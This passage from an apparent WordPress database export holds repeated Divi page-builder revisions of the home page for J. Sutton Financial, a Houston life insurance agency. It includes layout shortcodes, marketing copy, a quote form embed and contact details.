global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-72px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" custom_padding=\"62px|||||\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 20:54:42','2023-04-08 20:54:42','',138,'http://cmdev-site1.com/?p=850',0,'revision','',0),(851,1,'2023-04-08 20:59:40','2023-04-08 20:59:40','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" logo_width_last_edited=\"on|phone\" logo_width_phone=\"75%\" sticky_enabled=\"0\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_text_color=\"#FFFFFF\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" custom_margin_last_edited=\"on|phone\" submenu_direction=\"downwards\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_bg_color_last_edited=\"on|phone\" mobile_menu_text_color__hover_enabled=\"on|desktop\" custom_margin_phone=\"-10px||||false|false\" logo_width_tablet=\"20%\" custom_margin_tablet=\"-43px|||0px|false|false\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-72px|||\" custom_padding=\"||0px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" custom_padding=\"62px|||||\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 20:59:40','2023-04-08 20:59:40','',138,'http://cmdev-site1.com/?p=851',0,'revision','',0),(852,1,'2023-04-08 21:03:21','2023-04-08 21:03:21','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-72px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"1_2,1_2\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_padding=\"62px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_padding=\"62px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row 